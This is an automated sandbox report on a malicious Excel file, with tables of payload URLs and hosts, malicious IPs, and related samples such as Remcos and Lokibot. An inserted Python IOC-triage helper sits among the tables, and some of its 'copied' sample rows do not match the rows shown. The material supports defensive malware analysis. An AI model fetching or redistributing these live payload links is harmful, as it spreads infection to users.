https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace~ | mshta.exe, 00000012.00000002.524670515.00000000000EC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4 | powershell.exe, 0000001E.00000002.585706991.00000000000AF000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://go.micros | powershell.exe, 00000006.00000002.480662155.00000000034EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.532499393.0000000002497000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htahttp://192.3.220.29/45/ww/ | mshta.exe, 00000004.00000003.454723183.00000000034D5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.521827851.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.524091180.0000000002A25000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp/C | CasPol.exe, 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | - | high
http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta... | mshta.exe, 00000004.00000003.453814399.0000000000442000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454904762.0000000000442000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454576074.0000000000442000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.524379592.000000000015D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522772525.000000000015D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.524670515.000000000015D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000006.00000002.489702897.0000000012161000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://nuget.org/nuget.exe | powershell.exe, 00000006.00000002.489702897.0000000012161000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://provit.uk/VQ | mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.entrust.net0D | mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000006.00000002.480662155.0000000002131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.548845698.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.532499393.00000000021D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.588241264.0000000002351000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S | powershell.exe, 0000001E.00000002.588241264.0000000002551000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://nuget.org/NuGet.exe | powershell.exe, 00000006.00000002.489702897.0000000012161000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.html-code-generator.com | mshta.exe, 00000004.00000003.454427910.0000000005CB4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454213211.0000000003B70000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453457562.0000000004C7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455362300.0000000004C7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455101955.0000000003F2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453550721.0000000005CB4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454198100.0000000004940000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455678281.0000000005CB4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453622443.0000000005BE9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454567306.0000000003F2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454219108.0000000003820000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453622443.0000000005C78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454375370.0000000003F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454320143.0000000005CB4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453653166.0000000005C78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453653166.0000000005B11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453476331.0000000005C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454228756.0000000005800000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454264813.0000000005D2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453637390.0000000005CC1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455663242.0000000005C78000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.3.220.29/45/seehaving | powershell.exe, 00000006.00000002.480662155.0000000002331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.532499393.000000000256C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.entrust.net/server1.crl0 | mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://contoso.com/Icon | powershell.exe, 00000006.00000002.489702897.0000000012161000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htaier=jagged&laceg | mshta.exe, 00000004.00000002.455070536.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://provit.uk/0 | mshta.exe, 00000012.00000003.524339714.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.000000000399C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htaier=jagged&lace | mshta.exe, 00000012.00000003.522772525.00000000000EC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta...K | mshta.exe, 00000004.00000003.453814399.0000000000442000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.3.220.29/ | mshta.exe, 00000004.00000003.454355851.0000000003EE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003EE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455070536.0000000003EE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.0000000003A11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.0000000003A11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.0000000003A11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.0000000003A11000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFp | powershell.exe, 00000006.00000002.480662155.0000000002331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.532499393.000000000256C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lacew | mshta.exe, 00000012.00000002.524670515.00000000000CA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFC: | powershell.exe, 00000014.00000002.537521208.000000001ACD1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta&chan | mshta.exe, 00000012.00000003.524339714.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.000000000399C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://secure.comodo.com/CPS0 | mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.524339714.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://crl.entrust.net/2048ca.crl0 | mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lacek | mshta.exe, 00000004.00000002.454904762.00000000003E1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
192.3.220.29 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
142.215.209.78 | ip.1017.filemail.com | Canada | 32156 | HUMBER-COLLEGECA | false
192.3.101.149 | banaya.duckdns.org | United States | 36352 | AS-COLOCROSSINGUS | true
198.244.140.41 | provit.uk | United States | 18630 | RIDLEYSD-NETUS | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
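The two tables above carry the network IOCs of this run, but the flattened export glues each URL onto the name of the process whose memory it was found in, and the reputation columns ("Avira URL Cloud: safe", Malicious false) disagree with the IP table, which marks 192.3.220.29 malicious. The following Python is an added triage helper, not part of the Joe Sandbox report: it splits the memory-URL rows back into URL, source dumps and flag, aggregates them per host, joins each host to the IP table (by suffix in either direction, since the table lists the reverse-DNS name ip.1017.filemail.com), and marks hosts that served a .hta or .tIF which mshta.exe or powershell.exe then held in memory. The sample rows and the IP table are copied from this report; the process allowlist, the .hta/.tIF heuristic and all function names are this example's own assumptions.

```python
"""Added example: pull IOCs out of a flattened Joe Sandbox "URLs found in memory"
table and join them with the report's IP table. Not part of the report itself."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Process names that occur as sources in this report. The flattened export
# glues the URL onto the process name, so the split needs an explicit list
# (assumption: extend it for reports with other script hosts).
KNOWN_PROCESSES = ("mshta.exe", "powershell.exe", "wscript.exe", "CasPol.exe")

# Rows copied from the report's memory-URL table, in their flattened form:
#   <url as found in memory><process>, <dump id>.sdmp[, <process>, <dump id>.sdmp ...]<true|false>
SAMPLE_ROWS = [
    "http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFC("
    "powershell.exe, 00000006.00000002.490776775.000000001A746000.00000004.00000020.00020000.00000000.sdmpfalse",
    "https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&laceyX"
    "mshta.exe, 00000012.00000002.524670515.00000000000CA000.00000004.00000020.00020000.00000000.sdmpfalse",
    "http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta&chan0"
    "mshta.exe, 00000004.00000003.454355851.0000000003EE7000.00000004.00000020.00020000.00000000.sdmp, "
    "mshta.exe, 00000004.00000003.454533372.0000000003EE7000.00000004.00000020.00020000.00000000.sdmpfalse",
    "http://geoplugin.net/json.gp/C"
    "CasPol.exe, 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse",
    "https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4"
    "powershell.exe, 0000001E.00000002.585706991.00000000000AF000.00000004.00000020.00020000.00000000.sdmptrue",
]

# The report's IP table: domain as listed -> (IP, ASN name as listed).
IP_TABLE = {
    "192.3.220.29": ("192.3.220.29", "AS-COLOCROSSINGUS"),
    "ip.1017.filemail.com": ("142.215.209.78", "HUMBER-COLLEGECA"),
    "banaya.duckdns.org": ("192.3.101.149", "AS-COLOCROSSINGUS"),
    "provit.uk": ("198.244.140.41", "RIDLEYSD-NETUS"),
    "geoplugin.net": ("178.237.33.50", "ATOM86-ASATOM86NL"),
}


def source_pattern(known=KNOWN_PROCESSES):
    """Regex for one '<process>, <dump id>.sdmp' source. The first dump field is
    hex (0000001E appears above), so [0-9A-Fa-f] rather than \\d."""
    names = "|".join(re.escape(n) for n in known)
    return re.compile(r"(%s), ([0-9A-Fa-f]{8}(?:\.[0-9A-Fa-f]+)+\.sdmp)" % names)


def parse_row(row, known=KNOWN_PROCESSES):
    """Split one flattened row into URL string, source dumps and the Malicious flag."""
    flag = re.search(r"(true|false)$", row)
    if not flag:
        raise ValueError("row lacks trailing Malicious flag: %r" % row[:60])
    body = row[: flag.start()]
    hits = list(source_pattern(known).finditer(body))
    if not hits:
        raise ValueError("no known process source in row: %r" % row[:60])
    raw_url = body[: hits[0].start()]  # keeps the memory residue after the real URL
    return {
        "raw_url": raw_url,
        "host": urlsplit(raw_url).hostname,
        "processes": sorted({h.group(1) for h in hits}),
        "dumps": [h.group(2) for h in hits],
        "malicious": flag.group(1) == "true",
    }


def resolve(host, ip_table=IP_TABLE):
    """Look a URL host up in the IP table; match by suffix in either direction,
    because the table lists reverse-DNS names such as ip.1017.filemail.com."""
    for domain, (ip, asn) in ip_table.items():
        if host == domain or host.endswith("." + domain) or domain.endswith("." + host):
            return ip, asn
    return None, None


# No trailing \b: bytes of memory residue may follow the extension (".tIFC(").
PAYLOAD_EXT = re.compile(r"\.(hta|tif)", re.I)


def build_iocs(rows, known=KNOWN_PROCESSES, ip_table=IP_TABLE):
    """Aggregate rows per host. served_payload marks hosts whose URL carried an
    .hta or .tIF that a script host then held in memory; treat those as IOCs
    even where the reputation columns say safe/false."""
    by_host = defaultdict(lambda: {"processes": set(), "urls": set(), "malicious": False})
    for row in rows:
        r = parse_row(row, known)
        entry = by_host[r["host"]]
        entry["processes"].update(r["processes"])
        entry["urls"].add(r["raw_url"])
        entry["malicious"] |= r["malicious"]
    iocs = []
    for host, entry in sorted(by_host.items()):
        ip, asn = resolve(host, ip_table)
        iocs.append({
            "host": host, "ip": ip, "asn": asn,
            "processes": sorted(entry["processes"]),
            "flagged_by_report": entry["malicious"],
            "served_payload": any(PAYLOAD_EXT.search(u) for u in entry["urls"]),
        })
    return iocs


if __name__ == "__main__":
    for ioc in build_iocs(SAMPLE_ROWS):
        print(ioc)
```

Run against the five sample rows, 192.3.220.29 comes out with served_payload true and flagged_by_report false, held by both mshta.exe and powershell.exe; the filemail download is the only row the report itself flags. The process allowlist is the weak point of the split: a URL whose trailing residue happens to end in a known process name would be cut short, so check raw_url by eye before blocking on it.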
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1559540
Start date and time: 2024-11-20 16:55:48 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 24s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 35
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: pi-77159.xls
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.expl.evad.winXLS@39/51@13/5
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 28
• Number of non-executed functions: 186
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .xls
                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                      • Attach to Office via COM
                                                                      • Active ActiveX Object
                                                                      • Active ActiveX Object
                                                                      • Scroll down
                                                                      • Close Viewer
                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
• Execution Graph export aborted for target mshta.exe, PID 3652 because there are no executed functions
• Execution Graph export aborted for target mshta.exe, PID 3844 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: pi-77159.xls
Time | Type | Description
10:57:19 | API Interceptor | 169x Sleep call for process: mshta.exe modified
10:57:28 | API Interceptor | 628x Sleep call for process: powershell.exe modified
10:57:40 | API Interceptor | 18x Sleep call for process: wscript.exe modified
10:57:41 | API Interceptor | 90x Sleep call for process: AcroRd32.exe modified
10:58:12 | API Interceptor | 714356x Sleep call for process: CasPol.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
192.3.220.29 | New order.xls | malicious | Unknown | 192.3.220.29/111/wed/chakarathingsaregreatpatternwelcomebacktotherealworldbaby.hta
192.3.220.29 | New order.xls | malicious | Unknown | 192.3.220.29/111/wed/chakarathingsaregreatpatternwelcomebacktotherealworldbaby.hta
192.3.220.29 | New order.xls | malicious | Unknown | 192.3.220.29/111/wed/chakarathingsaregreatpatternwelcomebacktotherealworldbaby.hta
192.3.220.29 | seemebestthingswhichevermadebybestthingsgodown.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher | 192.3.220.29/66/SWRTFRR.txt
192.3.220.29 | CI.xls | malicious | Remcos, HTMLPhisher | 192.3.220.29/66/SWRTFRR.txt
142.215.209.78 | PO 2725724312_pdf.vbs | malicious | Unknown |
142.215.209.78 | seethebestthingswithgreatsituationshandletotheprogress.hta | malicious | Cobalt Strike, AgentTesla, HTMLPhisher |
142.215.209.78 | Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx | malicious | AgentTesla, HTMLPhisher |
142.215.209.78 | bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta | malicious | Cobalt Strike, HTMLPhisher, SmokeLoader |
142.215.209.78 | #U3010TW-S PO#U3011PO#3311-20241118003.xls | malicious | HTMLPhisher, SmokeLoader |
142.215.209.78 | seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher |
142.215.209.78 | Order_Summary.xls | malicious | Remcos, HTMLPhisher |
142.215.209.78 | kissmegoodthingwhichgivemebestthignswithgirluaremy.hta | malicious | Cobalt Strike, HTMLPhisher, Lokibot |
142.215.209.78 | bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta | malicious | Cobalt Strike, HTMLPhisher, Lokibot, Strela Stealer |
142.215.209.78 | Purchase order (1).xls | malicious | HTMLPhisher, Lokibot |
192.3.101.149 | seemebestthingswhichevermadebybestthingsgodown.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher |
192.3.101.149 | CI.xls | malicious | Remcos, HTMLPhisher |
192.3.101.149 | seethebestthingswithgoodthingswithgreatthignsfor.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher |
192.3.101.149 | 1731343866c2de3056a60ef2333b3e4532593a69f279ecfa2002460801978b2e618aaa77bc130.dat-decoded.exe | malicious | Remcos |
198.244.140.41 | Transferencia SPEI.xls | malicious | FormBook, HTMLPhisher |
198.244.140.41 | PO-000041492.docx.doc | malicious | Lokibot |
198.244.140.41 | Credit_DetailsCBS24312017918.xla.xlsx | malicious | HTMLPhisher |
198.244.140.41 | Payment Advice.xls | malicious | HTMLPhisher, Lokibot |
198.244.140.41 | Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx | malicious | AgentTesla, HTMLPhisher |
178.237.33.50 | sostener.vbs | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exe | malicious | Remcos, DBatLoader | geoplugin.net/json.gp
178.237.33.50 | Pago_BBVA.pdf.bat.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | USD470900_COPY_800BLHSBC882001.PDF.bat | malicious | Remcos, DBatLoader | geoplugin.net/json.gp
178.237.33.50 | globe_product_order_korea_buy_20_11_2024_000000000000000000.vbs | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | file.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | YYHh9QU804.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher | geoplugin.net/json.gp
178.237.33.50 | FRSSDE.exe | malicious | Remcos | geoplugin.net/json.gp
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip.1017.filemail.com | PO 2725724312_pdf.vbs | malicious | Unknown | 142.215.209.78
ip.1017.filemail.com | seethebestthingswithgreatsituationshandletotheprogress.hta | malicious | Cobalt Strike, AgentTesla, HTMLPhisher | 142.215.209.78
ip.1017.filemail.com | Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx | malicious | AgentTesla, HTMLPhisher | 142.215.209.78
ip.1017.filemail.com | bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta | malicious | Cobalt Strike, HTMLPhisher, SmokeLoader | 142.215.209.78
ip.1017.filemail.com | #U3010TW-S PO#U3011PO#3311-20241118003.xls | malicious | HTMLPhisher, SmokeLoader | 142.215.209.78
ip.1017.filemail.com | seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher | 142.215.209.78
ip.1017.filemail.com | Order_Summary.xls | malicious | Remcos, HTMLPhisher | 142.215.209.78
ip.1017.filemail.com | kissmegoodthingwhichgivemebestthignswithgirluaremy.hta | malicious | Cobalt Strike, HTMLPhisher, Lokibot | 142.215.209.78
ip.1017.filemail.com | bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta | malicious | Cobalt Strike, HTMLPhisher, Lokibot, Strela Stealer | 142.215.209.78
ip.1017.filemail.com | Purchase order (1).xls | malicious | HTMLPhisher, Lokibot | 142.215.209.78
provit.uk | Transferencia SPEI.xls | malicious | FormBook, HTMLPhisher | 198.244.140.41
provit.uk | PO-000041492.docx.doc | malicious | Lokibot | 198.244.140.41
provit.uk | Credit_DetailsCBS24312017918.xla.xlsx | malicious | HTMLPhisher | 198.244.140.41
provit.uk | Payment Advice.xls | malicious | HTMLPhisher, Lokibot | 198.244.140.41
provit.uk | Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx | malicious | AgentTesla, HTMLPhisher | 198.244.140.41
geoplugin.net | sostener.vbs | malicious | Remcos | 178.237.33.50
geoplugin.net | 1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exe | malicious | Remcos, DBatLoader | 178.237.33.50
geoplugin.net | Pago_BBVA.pdf.bat.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | USD470900_COPY_800BLHSBC882001.PDF.bat | malicious | Remcos, DBatLoader | 178.237.33.50
geoplugin.net | globe_product_order_korea_buy_20_11_2024_000000000000000000.vbs | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | file.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | YYHh9QU804.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher | 178.237.33.50
geoplugin.net | FRSSDE.exe | malicious | Remcos | 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
HUMBER-COLLEGECA | PO 2725724312_pdf.vbs | malicious | Unknown | 142.215.209.78
HUMBER-COLLEGECA | seethebestthingswithgreatsituationshandletotheprogress.hta | malicious | Cobalt Strike, AgentTesla, HTMLPhisher | 142.215.209.78
HUMBER-COLLEGECA | Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx | malicious | AgentTesla, HTMLPhisher | 142.215.209.78
HUMBER-COLLEGECA | bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta | malicious | Cobalt Strike, HTMLPhisher, SmokeLoader | 142.215.209.78
HUMBER-COLLEGECA | #U3010TW-S PO#U3011PO#3311-20241118003.xls | malicious | HTMLPhisher, SmokeLoader | 142.215.209.78
HUMBER-COLLEGECA | seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher | 142.215.209.78
HUMBER-COLLEGECA | Order_Summary.xls | malicious | Remcos, HTMLPhisher | 142.215.209.78
